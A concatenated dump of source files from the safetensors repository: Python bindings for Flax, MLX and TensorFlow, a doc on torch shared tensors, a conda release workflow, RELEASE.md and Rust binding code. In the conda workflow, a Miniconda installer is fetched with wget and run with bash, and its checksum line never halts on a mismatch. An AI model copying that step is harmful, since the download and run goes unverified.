68 | save_file(tensors, "model.safetensors")
69 | ```
70 | """
71 | np_tensors = _jnp2np(tensors)
72 | return numpy.save_file(np_tensors, filename, metadata=metadata)
73 |
74 |
75 | def load(data: bytes) -> Dict[str, Array]:
76 | """
77 | Loads a safetensors file into flax format from pure bytes.
78 |
79 | Args:
80 | data (`bytes`):
81 | The content of a safetensors file
82 |
83 | Returns:
84 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array` on cpu
85 |
86 | Example:
87 |
88 | ```python
89 | from safetensors.flax import load
90 |
91 | file_path = "./my_folder/bert.safetensors"
92 | with open(file_path, "rb") as f:
93 | data = f.read()
94 |
95 | loaded = load(data)
96 | ```
97 | """
98 | flat = numpy.load(data)
99 | return _np2jnp(flat)
100 |
101 |
102 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, Array]:
103 | """
104 | Loads a safetensors file into flax format.
105 |
106 | Args:
107 | filename (`str`, or `os.PathLike`)):
108 | The name of the file which contains the tensors
109 |
110 | Returns:
111 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array`
112 |
113 | Example:
114 |
115 | ```python
116 | from safetensors.flax import load_file
117 |
118 | file_path = "./my_folder/bert.safetensors"
119 | loaded = load_file(file_path)
120 | ```
121 | """
122 | result = {}
123 | with safe_open(filename, framework="flax") as f:
124 | for k in f.offset_keys():
125 | result[k] = f.get_tensor(k)
126 | return result
127 |
128 |
129 | def _np2jnp(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, Array]:
130 | for k, v in numpy_dict.items():
131 | numpy_dict[k] = jnp.array(v)
132 | return numpy_dict
133 |
134 |
135 | def _jnp2np(jnp_dict: Dict[str, Array]) -> Dict[str, np.array]:
136 | for k, v in jnp_dict.items():
137 | jnp_dict[k] = np.asarray(v)
138 | return jnp_dict
139 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/mlx.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 |
6 | import mlx.core as mx
7 | from safetensors import numpy, safe_open
8 |
9 |
10 | def save(
11 | tensors: Dict[str, mx.array], metadata: Optional[Dict[str, str]] = None
12 | ) -> bytes:
13 | """
14 | Saves a dictionary of tensors into raw bytes in safetensors format.
15 |
16 | Args:
17 | tensors (`Dict[str, mx.array]`):
18 | The incoming tensors. Tensors need to be contiguous and dense.
19 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
20 | Optional text only metadata you might want to save in your header.
21 | For instance it can be useful to specify more about the underlying
22 | tensors. This is purely informative and does not affect tensor loading.
23 |
24 | Returns:
25 | `bytes`: The raw bytes representing the format
26 |
27 | Example:
28 |
29 | ```python
30 | from safetensors.mlx import save
31 | import mlx.core as mx
32 |
33 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))}
34 | byte_data = save(tensors)
35 | ```
36 | """
37 | np_tensors = _mx2np(tensors)
38 | return numpy.save(np_tensors, metadata=metadata)
39 |
40 |
41 | def save_file(
42 | tensors: Dict[str, mx.array],
43 | filename: Union[str, os.PathLike],
44 | metadata: Optional[Dict[str, str]] = None,
45 | ) -> None:
46 | """
47 | Saves a dictionary of tensors into raw bytes in safetensors format.
48 |
49 | Args:
50 | tensors (`Dict[str, mx.array]`):
51 | The incoming tensors. Tensors need to be contiguous and dense.
52 | filename (`str`, or `os.PathLike`)):
53 | The filename we're saving into.
54 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
55 | Optional text only metadata you might want to save in your header.
56 | For instance it can be useful to specify more about the underlying
57 | tensors. This is purely informative and does not affect tensor loading.
58 |
59 | Returns:
60 | `None`
61 |
62 | Example:
63 |
64 | ```python
65 | from safetensors.mlx import save_file
66 | import mlx.core as mx
67 |
68 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))}
69 | save_file(tensors, "model.safetensors")
70 | ```
71 | """
72 | np_tensors = _mx2np(tensors)
73 | return numpy.save_file(np_tensors, filename, metadata=metadata)
74 |
75 |
76 | def load(data: bytes) -> Dict[str, mx.array]:
77 | """
78 | Loads a safetensors file into MLX format from pure bytes.
79 |
80 | Args:
81 | data (`bytes`):
82 | The content of a safetensors file
83 |
84 | Returns:
85 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array`
86 |
87 | Example:
88 |
89 | ```python
90 | from safetensors.mlx import load
91 |
92 | file_path = "./my_folder/bert.safetensors"
93 | with open(file_path, "rb") as f:
94 | data = f.read()
95 |
96 | loaded = load(data)
97 | ```
98 | """
99 | flat = numpy.load(data)
100 | return _np2mx(flat)
101 |
102 |
103 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, mx.array]:
104 | """
105 | Loads a safetensors file into MLX format.
106 |
107 | Args:
108 | filename (`str`, or `os.PathLike`)):
109 | The name of the file which contains the tensors
110 |
111 | Returns:
112 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array`
113 |
114 | Example:
115 |
116 | ```python
117 | from safetensors.flax import load_file
118 |
119 | file_path = "./my_folder/bert.safetensors"
120 | loaded = load_file(file_path)
121 | ```
122 | """
123 | result = {}
124 | with safe_open(filename, framework="mlx") as f:
125 | for k in f.offset_keys():
126 | result[k] = f.get_tensor(k)
127 | return result
128 |
129 |
130 | def _np2mx(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, mx.array]:
131 | for k, v in numpy_dict.items():
132 | numpy_dict[k] = mx.array(v)
133 | return numpy_dict
134 |
135 |
136 | def _mx2np(mx_dict: Dict[str, mx.array]) -> Dict[str, np.array]:
137 | new_dict = {}
138 | for k, v in mx_dict.items():
139 | new_dict[k] = np.asarray(v)
140 | return new_dict
141 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/tensorflow.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 | import tensorflow as tf
6 |
7 | from safetensors import numpy, safe_open
8 |
9 |
10 | def save(
11 | tensors: Dict[str, tf.Tensor], metadata: Optional[Dict[str, str]] = None
12 | ) -> bytes:
13 | """
14 | Saves a dictionary of tensors into raw bytes in safetensors format.
15 |
16 | Args:
17 | tensors (`Dict[str, tf.Tensor]`):
18 | The incoming tensors. Tensors need to be contiguous and dense.
19 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
20 | Optional text only metadata you might want to save in your header.
21 | For instance it can be useful to specify more about the underlying
22 | tensors. This is purely informative and does not affect tensor loading.
23 |
24 | Returns:
25 | `bytes`: The raw bytes representing the format
26 |
27 | Example:
28 |
29 | ```python
30 | from safetensors.tensorflow import save
31 | import tensorflow as tf
32 |
33 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))}
34 | byte_data = save(tensors)
35 | ```
36 | """
37 | np_tensors = _tf2np(tensors)
38 | return numpy.save(np_tensors, metadata=metadata)
39 |
40 |
41 | def save_file(
42 | tensors: Dict[str, tf.Tensor],
43 | filename: Union[str, os.PathLike],
44 | metadata: Optional[Dict[str, str]] = None,
45 | ) -> None:
46 | """
47 | Saves a dictionary of tensors into raw bytes in safetensors format.
48 |
49 | Args:
50 | tensors (`Dict[str, tf.Tensor]`):
51 | The incoming tensors. Tensors need to be contiguous and dense.
52 | filename (`str`, or `os.PathLike`)):
53 | The filename we're saving into.
54 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
55 | Optional text only metadata you might want to save in your header.
56 | For instance it can be useful to specify more about the underlying
57 | tensors. This is purely informative and does not affect tensor loading.
58 |
59 | Returns:
60 | `None`
61 |
62 | Example:
63 |
64 | ```python
65 | from safetensors.tensorflow import save_file
66 | import tensorflow as tf
67 |
68 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))}
69 | save_file(tensors, "model.safetensors")
70 | ```
71 | """
72 | np_tensors = _tf2np(tensors)
73 | return numpy.save_file(np_tensors, filename, metadata=metadata)
74 |
75 |
76 | def load(data: bytes) -> Dict[str, tf.Tensor]:
77 | """
78 | Loads a safetensors file into tensorflow format from pure bytes.
79 |
80 | Args:
81 | data (`bytes`):
82 | The content of a safetensors file
83 |
84 | Returns:
85 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` on cpu
86 |
87 | Example:
88 |
89 | ```python
90 | from safetensors.tensorflow import load
91 |
92 | file_path = "./my_folder/bert.safetensors"
93 | with open(file_path, "rb") as f:
94 | data = f.read()
95 |
96 | loaded = load(data)
97 | ```
98 | """
99 | flat = numpy.load(data)
100 | return _np2tf(flat)
101 |
102 |
103 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, tf.Tensor]:
104 | """
105 | Loads a safetensors file into tensorflow format.
106 |
107 | Args:
108 | filename (`str`, or `os.PathLike`)):
109 | The name of the file which contains the tensors
110 |
111 | Returns:
112 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor`
113 |
114 | Example:
115 |
116 | ```python
117 | from safetensors.tensorflow import load_file
118 |
119 | file_path = "./my_folder/bert.safetensors"
120 | loaded = load_file(file_path)
121 | ```
122 | """
123 | result = {}
124 | with safe_open(filename, framework="tf") as f:
125 | for k in f.offset_keys():
126 | result[k] = f.get_tensor(k)
127 | return result
128 |
129 |
130 | def _np2tf(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, tf.Tensor]:
131 | for k, v in numpy_dict.items():
132 | numpy_dict[k] = tf.convert_to_tensor(v)
133 | return numpy_dict
134 |
135 |
136 | def _tf2np(tf_dict: Dict[str, tf.Tensor]) -> Dict[str, np.array]:
137 | for k, v in tf_dict.items():
138 | tf_dict[k] = v.numpy()
139 | return tf_dict
140 |
--------------------------------------------------------------------------------
/docs/source/torch_shared_tensors.mdx:
--------------------------------------------------------------------------------
1 | # Torch shared tensors
2 |
3 |
4 | ## TL;DR
5 |
6 | Using specific functions, which should work in most cases for you.
7 | This is not without side effects.
8 |
9 | ```python
10 | from safetensors.torch import load_model, save_model
11 |
12 | save_model(model, "model.safetensors")
13 | # Instead of save_file(model.state_dict(), "model.safetensors")
14 |
15 | load_model(model, "model.safetensors")
16 | # Instead of model.load_state_dict(load_file("model.safetensors"))
17 | ```
18 |
19 | ## What are shared tensors ?
20 |
21 | Pytorch uses shared tensors for some computation.
22 | This is extremely interesting to reduce memory usage in general.
23 |
24 | One very classic use case is in transformers the `embeddings` are shared with
25 | `lm_head`. By using the same matrix, the model uses less parameters, and gradients
26 | flow much better to the `embeddings` (which is the start of the model, so they don't
27 | flow easily there, whereas `lm_head` is at the tail of the model, so gradients are
28 | extremely good over there, since they are the same tensors, they both benefit)
29 |
30 |
31 | ```python
32 | from torch import nn
33 |
34 | class Model(nn.Module):
35 | def __init__(self):
36 | super().__init__()
37 | self.a = nn.Linear(100, 100)
38 | self.b = self.a
39 |
40 | def forward(self, x):
41 | return self.b(self.a(x))
42 |
43 |
44 | model = Model()
45 | print(model.state_dict())
46 | # odict_keys(['a.weight', 'a.bias', 'b.weight', 'b.bias'])
47 | torch.save(model.state_dict(), "model.bin")
48 | # This file is now 41k instead of ~80k, because A and B are the same weight hence only 1 is saved on disk with both `a` and `b` pointing to the same buffer
49 | ```
50 |
51 | ## Why are shared tensors not saved in `safetensors` ?
52 |
53 | Multiple reasons for that:
54 |
55 | - *Not all frameworks support them* for instance `tensorflow` does not.
56 | So if someone saves shared tensors in torch, there is no way to
57 | load them in a similar fashion so we could not keep the same `Dict[str, Tensor]`
58 | API.
59 | - *It makes lazy loading very quickly.*
60 | Lazy loading is the ability to load only some tensors, or part of tensors for
61 | a given file. This is trivial to do without sharing tensors but with tensor sharing
62 |
63 | ```python
64 | with safe_open("model.safetensors", framework="pt") as f:
65 | a = f.get_tensor("a")
66 | b = f.get_tensor("b")
67 | ```
68 |
69 | Now it's impossible with this given code to "reshare" buffers after the fact.
70 | Once we give the `a` tensor we have no way to give back the same memory when
71 | you ask for `b`. (In this particular example we could keep track of given buffers
72 | but this is not the case in general, since you could do arbitrary work with `a`
73 | like sending it to another device before asking for `b`)
74 | - *It can lead to much larger file than necessary*.
75 | If you are saving a shared tensor which is only a fraction of a larger tensor,
76 | then saving it with pytorch leads to saving the entire buffer instead of saving
77 | just what is needed.
78 |
79 | ```python
80 | a = torch.zeros((100, 100))
81 | b = a[:1, :]
82 | torch.save({"b": b}, "model.bin")
83 | # File is 41k instead of the expected 400 bytes
84 | # In practice it could happen that you save several 10GB instead of 1GB.
85 | ```
86 |
87 | Now with all those reasons being mentioned, nothing is set in stone in there.
88 | Shared tensors do not cause unsafety, or denial of service potential, so this
89 | decision could be revisited if current workarounds are not satisfactory.
90 |
91 | ## How does it work ?
92 |
93 | The design is rather simple.
94 | We're going to look for all shared tensors, then looking for all tensors
95 | covering the entire buffer (there can be multiple such tensors).
96 | That gives us multiple names which can be saved, we simply choose the first one
97 |
98 | During `load_model`, we are loading a bit like `load_state_dict` does, except
99 | we're looking into the model itself, to check for shared buffers, and ignoring
100 | the "missed keys" which were actually covered by virtue of buffer sharing (they
101 | were properly loaded since there was a buffer that loaded under the hood).
102 | Every other error is raised as-is
103 |
104 | **Caveat**: This means we're dropping some keys within the file. meaning if you're
105 | checking for the keys saved on disk, you will see some "missing tensors" or if you're
106 | using `load_state_dict`. Unless we start supporting shared tensors directly in
107 | the format there's no real way around it.
108 |
--------------------------------------------------------------------------------
/.github/workflows/python-release-conda.yml:
--------------------------------------------------------------------------------
1 | name: Python Release - Conda
2 |
3 | on:
4 | push:
5 | tags:
6 | - v*
7 |
8 | env:
9 | ANACONDA_API_TOKEN: ${{ secrets.ANACONDA_API_TOKEN }}
10 |
11 | jobs:
12 | build_and_package:
13 | runs-on: ${{ matrix.os }}
14 | strategy:
15 | matrix:
16 | os: [windows-latest, macos-latest]
17 | python: ["3.9", "3.10", "3.11", "3.12", "3.13"]
18 |
19 | steps:
20 | - name: Checkout repository
21 | uses: actions/checkout@v6
22 |
23 | - name: Install miniconda
24 | uses: conda-incubator/setup-miniconda@v3
25 | with:
26 | auto-update-conda: true
27 | miniconda-version: "latest"
28 | python-version: ${{ matrix.python }}
29 | channels: conda-forge
30 |
31 | - name: Conda info
32 | shell: bash -l {0}
33 | run: conda info
34 |
35 | - name: Install Rust
36 | uses: dtolnay/rust-toolchain@stable
37 |
38 | - name: Setup conda env
39 | shell: bash -l {0}
40 | run: |
41 | conda install setuptools-rust
42 | conda install -c defaults anaconda-client conda-build
43 |
44 | - name: Extract version
45 | shell: bash -l {0}
46 | working-directory: ./bindings/python
47 | run: echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV
48 |
49 | - name: Build conda packages
50 | shell: bash -l {0}
51 | run: |
52 | conda info
53 | conda list
54 | conda-build .github/conda --python=${{ matrix.python }}
55 |
56 | - name: Upload to Anaconda
57 | shell: bash -l {0}
58 | run: |
59 | anaconda upload `conda-build .github/conda --output` --force
60 |
61 | build_and_package_linux:
62 | runs-on: ubuntu-latest
63 | container: quay.io/pypa/manylinux_2_28_x86_64
64 |
65 | strategy:
66 | fail-fast: false
67 | matrix:
68 | python: [39, 310, 311, 312, 313]
69 | include:
70 | - python: 39
71 | checksum: d8d13344b46a057659397b9ca1a948d184bf59f04efa8864df8c01f7557e2baa
72 | - python: 310
73 | checksum: 04a8b03d8b0ec062d923e592201a6fd88b7247c309ef8848afb25c424c40ac39
74 | - python: 311
75 | checksum: 238abad23f8d4d8ba89dd05df0b0079e278909a36e06955f12bbef4aa94e6131
76 | - python: 312
77 | checksum: a0def9c732d94b156529ef7db8edd6e1862cee784a27a4961870dca86e89fba4
78 | - python: 313
79 | checksum: 6022714da22986097bbefa13dab3d957257fef04e1c37d1ebd3645b5b99bc9d4
80 |
81 | steps:
82 | - name: Checkout repository
83 | uses: actions/checkout@v6
84 |
85 | - name: Install miniconda
86 | run: |
87 | yum install -y wget openssl-devel
88 | export FILENAME=Miniconda3-py${{ matrix.python }}_25.9.1-1-Linux-x86_64.sh
89 | wget https://repo.anaconda.com/miniconda/$FILENAME
90 | sha256sum $FILENAME | awk '$1=="${{ matrix.checksum}}"{print"good to go"}'
91 | bash $FILENAME -b -p $HOME/miniconda
92 | source $HOME/miniconda/bin/activate
93 |
94 | - name: Show glibc information
95 | shell: bash -l {0}
96 | run: ldd --version
97 |
98 | - name: Conda info
99 | shell: bash -l {0}
100 | run: |
101 | source $HOME/miniconda/bin/activate
102 | conda info
103 |
104 | - name: Install Rust
105 | uses: dtolnay/rust-toolchain@stable
106 |
107 | - name: Setup conda env
108 | shell: bash -l {0}
109 | run: |
110 | source $HOME/miniconda/bin/activate
111 | conda install setuptools-rust
112 | conda install -c defaults anaconda-client conda-build
113 |
114 | - name: Extract version
115 | shell: bash -l {0}
116 | working-directory: ./bindings/python
117 | run: |
118 | source $HOME/miniconda/bin/activate
119 | echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV
120 |
121 | - name: Build conda packages
122 | shell: bash -l {0}
123 | run: |
124 | source $HOME/miniconda/bin/activate
125 | conda info
126 | conda list
127 | conda-build .github/conda --python=${{ matrix.python }}
128 |
129 | - name: Upload to Anaconda
130 | shell: bash -l {0}
131 | run: |
132 | source $HOME/miniconda/bin/activate
133 | anaconda upload `conda-build .github/conda --output` --force
134 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug-report.yml:
--------------------------------------------------------------------------------
1 | name: "\U0001F41B Bug Report"
2 | description: Submit a bug report to help us improve safetensors
3 | body:
4 | - type: textarea
5 | id: system-info
6 | attributes:
7 | label: System Info
8 | description: Please share your system info with us. You can run the command `transformers-cli env` and copy-paste its output below.
9 | placeholder: safetensors version, platform, python version, ...
10 | validations:
11 | required: true
12 |
13 | # - type: textarea
14 | # id: who-can-help
15 | # attributes:
16 | # label: Who can help?
17 | # description: |
18 | # Your issue will be replied to more quickly if you can figure out the right person to tag with @
19 | # If you know how to use git blame, that is the easiest way, otherwise, here is a rough guide of **who to tag**.
20 | #
21 | # All issues are read by one of the core maintainers, so if you don't know who to tag, just leave this blank and
22 | # a core maintainer will ping the right person.
23 | #
24 | # Please tag fewer than 3 people.
25 | #
26 | # Models:
27 |
28 | # - text models: @ArthurZucker and @younesbelkada
29 | # - vision models: @amyeroberts
30 | # - speech models: @sanchit-gandhi
31 | # - graph models: @clefourrier
32 | #
33 | # Library:
34 | #
35 | # - flax: @sanchit-gandhi
36 | # - generate: @gante
37 | # - pipelines: @Narsil
38 | # - tensorflow: @gante and @Rocketknight1
39 | # - tokenizers: @ArthurZucker
40 | # - trainer: @sgugger
41 | #
42 | # Integrations:
43 | #
44 | # - deepspeed: HF Trainer: @stas00, Accelerate: @pacman100
45 | # - ray/raytune: @richardliaw, @amogkam
46 | # - Big Model Inference: @sgugger @muellerzr
47 | #
48 | # Documentation: @sgugger, @stevhliu and @MKhalusova
49 | #
50 | # Model hub:
51 |
52 | # - for issues with a model, report at https://discuss.huggingface.co/ and tag the model's creator.
53 | #
54 | # HF projects:
55 | #
56 | # - accelerate: [different repo](https://github.com/huggingface/accelerate)
57 | # - datasets: [different repo](https://github.com/huggingface/datasets)
58 | # - diffusers: [different repo](https://github.com/huggingface/diffusers)
59 | # - rust tokenizers: [different repo](https://github.com/huggingface/tokenizers)
60 | #
61 | # Maintained examples (not research project or legacy):
62 | #
63 | # - Flax: @sanchit-gandhi
64 | # - PyTorch: @sgugger
65 | # - TensorFlow: @Rocketknight1
66 |
67 | # Research projects are not maintained and should be taken as is.
68 |
69 | # placeholder: "@Username ..."
70 |
71 | - type: checkboxes
72 | id: information-scripts-examples
73 | attributes:
74 | label: Information
75 | description: 'The problem arises when using:'
76 | options:
77 | - label: "The official example scripts"
78 | - label: "My own modified scripts"
79 |
80 | - type: textarea
81 | id: reproduction
82 | validations:
83 | required: true
84 | attributes:
85 | label: Reproduction
86 | description: |
87 | Please provide a code sample that reproduces the problem you ran into. It can be a Colab link or just a code snippet.
88 | If you have code snippets, error messages, stack traces please provide them here as well.
89 | Important! Use code tags to correctly format your code. See https://help.github.com/en/github/writing-on-github/creating-and-highlighting-code-blocks#syntax-highlighting
90 | Do not use screenshots, as they are hard to read and (more importantly) don't allow others to copy-and-paste your code.
91 |
92 | placeholder: |
93 | Steps to reproduce the behavior:
94 |
95 | 1.
96 | 2.
97 | 3.
98 |
99 |
100 | - type: textarea
101 | id: expected-behavior
102 | validations:
103 | required: true
104 | attributes:
105 | label: Expected behavior
106 | description: "A clear and concise description of what you would expect to happen."
107 |
--------------------------------------------------------------------------------
/bindings/python/src/view.rs:
--------------------------------------------------------------------------------
1 | use crate::SafetensorError;
2 | #[cfg(feature = "py311")]
3 | use pyo3::buffer::PyBuffer;
4 | use pyo3::prelude::*;
5 | #[cfg(feature = "py38")]
6 | use pyo3::types::PyBytes;
7 | use pyo3::types::PyDict;
8 | use pyo3::Bound as PyBound;
9 | use safetensors::{Dtype, View};
10 | use std::borrow::Cow;
11 | use std::collections::HashMap;
12 |
13 | #[cfg(feature = "py38")]
14 | pub struct PyView<'a> {
15 | shape: Vec,
16 | dtype: Dtype,
17 | data: PyBound<'a, PyBytes>,
18 | data_len: usize,
19 | }
20 |
21 | #[cfg(feature = "py311")]
22 | pub struct PyView<'a> {
23 | shape: Vec,
24 | dtype: Dtype,
25 | data: PyBuffer,
26 | data_len: usize,
27 | // Kept to keep the GIL open while we hold the buffer
28 | _py: Python<'a>,
29 | }
30 |
31 | impl View for &PyView<'_> {
32 | #[cfg(feature = "py38")]
33 | fn data(&self) -> std::borrow::Cow<[u8]> {
34 | Cow::Borrowed(self.data.as_bytes())
35 | }
36 | #[cfg(feature = "py311")]
37 | fn data(&self) -> std::borrow::Cow<[u8]> {
38 | // We already checked this in the Python side.
39 | assert!(self.data.is_c_contiguous());
40 | // XXX: Ideally we could have at least readonly tensors
41 | // assert!(self.data.readonly());
42 | // SAFETY:
43 | // This is actually totally unsafe, PyBuffer is not immutable and could be changed from
44 | // under us.
45 | // This is made safer because we're still hanging to the GIL while treating
46 | // this structure
47 | Cow::Borrowed(unsafe {
48 | std::slice::from_raw_parts(self.data.buf_ptr() as *const u8, self.data.item_count())
49 | })
50 | }
51 | fn shape(&self) -> &[usize] {
52 | &self.shape
53 | }
54 | fn dtype(&self) -> Dtype {
55 | self.dtype
56 | }
57 | fn data_len(&self) -> usize {
58 | self.data_len
59 | }
60 | }
61 |
62 | pub fn prepare(tensor_dict: HashMap>) -> PyResult> {
63 | let mut tensors = HashMap::with_capacity(tensor_dict.len());
64 | for (tensor_name, tensor_desc) in &tensor_dict {
65 | let mut shape: Vec = tensor_desc
66 | .get_item("shape")?
67 | .ok_or_else(|| SafetensorError::new_err(format!("Missing `shape` in {tensor_desc:?}")))?
68 | .extract()?;
69 | let pydata: PyBound = tensor_desc.get_item("data")?.ok_or_else(|| {
70 | SafetensorError::new_err(format!("Missing `data` in {tensor_desc:?}"))
71 | })?;
72 |
73 | let pydtype = tensor_desc.get_item("dtype")?.ok_or_else(|| {
74 | SafetensorError::new_err(format!("Missing `dtype` in {tensor_desc:?}"))
75 | })?;
76 | let dtype: String = pydtype.extract()?;
77 | let dtype = match dtype.as_ref() {
78 | "bool" => Dtype::BOOL,
79 | "int8" => Dtype::I8,
80 | "uint8" => Dtype::U8,
81 | "int16" => Dtype::I16,
82 | "uint16" => Dtype::U16,
83 | "int32" => Dtype::I32,
84 | "uint32" => Dtype::U32,
85 | "int64" => Dtype::I64,
86 | "uint64" => Dtype::U64,
87 | "float16" => Dtype::F16,
88 | "float32" => Dtype::F32,
89 | "float64" => Dtype::F64,
90 | "bfloat16" => Dtype::BF16,
91 | "float8_e4m3fn" => Dtype::F8_E4M3,
92 | "float8_e5m2" => Dtype::F8_E5M2,
93 | "float8_e8m0fnu" => Dtype::E8M0,
94 | "float4_e2m1fn_x2" => Dtype::F4,
95 | "complex64" => Dtype::C64,
96 | dtype_str => {
97 | return Err(SafetensorError::new_err(format!(
98 | "dtype {dtype_str} is not covered",
99 | )));
100 | }
101 | };
102 | if dtype == Dtype::F4 {
103 | let n = shape.len();
104 | shape[n - 1] *= 2;
105 | }
106 |
107 | #[cfg(feature = "py311")]
108 | let tensor = {
109 | let data: PyBuffer = pydata.extract()?;
110 | if !data.is_c_contiguous() {
111 | return Err(SafetensorError::new_err("Python buffer is not contiguous"));
112 | }
113 | // XXX Ideally this would be true.
114 | // if !data.readonly() {
115 | // return Err(SafetensorError::new_err("Python buffer is not readonly"));
116 | // }
117 | let data_len = data.item_count();
118 | let py = pydata.py();
119 | PyView {
120 | shape,
121 | dtype,
122 | data,
123 | data_len,
124 | _py: py,
125 | }
126 | };
127 |
128 | #[cfg(feature = "py38")]
129 | let tensor = {
130 | let data: &[u8] = pydata.extract()?;
131 | let data_len = data.len();
132 | let data: PyBound = pydata.extract()?;
133 | PyView {
134 | shape,
135 | dtype,
136 | data,
137 | data_len,
138 | }
139 | };
140 |
141 | tensors.insert(tensor_name.to_string(), tensor);
142 | }
143 | Ok(tensors)
144 | }
145 |
--------------------------------------------------------------------------------
/RELEASE.md:
--------------------------------------------------------------------------------
1 | ## How to release
2 |
3 | # Before the release
4 |
5 | Simple checklist on how to make releases for `safetensors`.
6 |
7 | - Freeze `main` branch.
8 | - Run all tests (Check CI has properly run)
9 | - If any significant work, check benchmarks:
10 | - `cd safetensors && cargo bench` (needs to be run on latest release tag to measure difference if it's your first time)
11 | - Run all `transformers` tests. (`transformers` is a big user of `safetensors` we need
12 | to make sure we don't break it, testing is one way to make sure nothing unforeseen
13 | has been done.)
14 | - Run all fast tests at the VERY least (not just the tokenization tests). (`RUN_PIPELINE_TESTS=1 CUDA_VISIBLE_DEVICES=-1 pytest -sv tests/`)
15 | - When all *fast* tests work, then we can also (it's recommended) run the whole `transformers`
16 | test suite.
17 | - Rebase this [PR](https://github.com/huggingface/transformers/pull/16708).
18 | This will create new docker images ready to run the tests suites with `safetensors` from the main branch.
19 | - Wait for actions to finish
20 | - Rebase this [PR](https://github.com/huggingface/transformers/pull/16712)
21 | This will run the actual full test suite.
22 | - Check the results.
23 | - **If any breaking change has been done**, make sure the version can safely be increased for transformers users (`safetensors` version need to make sure users don't upgrade before `transformers` has). [link](https://github.com/huggingface/transformers/blob/main/setup.py#L154)
24 | For instance `safetensors>=0.10,<0.11` so we can safely upgrade to `0.11` without impacting
25 | current users
26 | - Then start a new PR containing all desired code changes from the following steps.
27 | - You will `Create release` after the code modifications are on `master`.
28 |
29 | # Rust
30 |
31 | - `safetensors` (rust, python & node) versions don't have to be in sync but it's
32 | very common to release for all versions at once for new features.
33 | - Edit `Cargo.toml` to reflect new version
34 | - Edit `CHANGELOG.md`:
35 | - Add relevant PRs that were added (python PRs do not belong for instance).
36 | - Add links at the end of the files.
37 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
38 | - Create new Release:
39 | - Mark it as pre-release
40 | - Use new version name with a new tag (create on publish) `vX.X.X`.
41 | - Copy paste the new part of the `CHANGELOG.md`
42 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading
43 | the new version on `crates.io`, there's no going back after this
44 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
45 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again.
46 |
47 |
48 | # Python
49 |
50 | - Edit `bindings/python/setup.py` to reflect new version.
51 | - Edit `bindings/python/py_src/safetensors/__init__.py` to reflect new version.
52 | - Edit `CHANGELOG.md`:
53 | - Add relevant PRs that were added (node PRs do not belong for instance).
54 | - Add links at the end of the files.
55 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
56 | - Create new Release:
57 | - Mark it as pre-release
58 | - Use new version name with a new tag (create on publish) `python-vX.X.X`.
59 | - Copy paste the new part of the `CHANGELOG.md`
60 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading
61 | the new version on `pypi`, there's no going back after this
62 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
63 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again.
64 | - This CI/CD has 3 distinct builds, `Pypi`(normal), `conda` and `extra`. `Extra` is REALLY slow (~4h), this is normal since it has to rebuild many things, but enables the wheel to be available for old Linuxes
65 |
66 | # Node
67 |
68 | - Edit `bindings/node/package.json` to reflect new version.
69 | - Edit `CHANGELOG.md`:
70 | - Add relevant PRs that were added (python PRs do not belong for instance).
71 | - Add links at the end of the files.
72 | - Go to [Releases](https://github.com/huggingface/safetensors/releases)
73 | - Create new Release:
74 | - Mark it as pre-release
75 | - Use new version name with a new tag (create on publish) `node-vX.X.X`.
76 | - Copy paste the new part of the `CHANGELOG.md`
77 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading
78 | the new version on `npm`, there's no going back after this
79 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly.
80 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again.
81 |
82 |
83 | # Testing the CI/CD for release
84 |
85 |
86 | If you want to make modifications to the CI/CD of the release GH actions, you need
87 | to :
88 | - **Comment the part that uploads the artifacts** to `crates.io`, `PyPi` or `npm`.
89 | - Change the trigger mechanism so it can trigger every time you push to your branch.
90 | - Keep pushing your changes until the artifacts are properly created.
91 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/__init__.pyi:
--------------------------------------------------------------------------------
1 | # Generated content DO NOT EDIT
2 | @staticmethod
3 | def deserialize(bytes):
4 | """
5 | Opens a safetensors lazily and returns tensors as asked
6 |
7 | Args:
8 | data (`bytes`):
9 | The byte content of a file
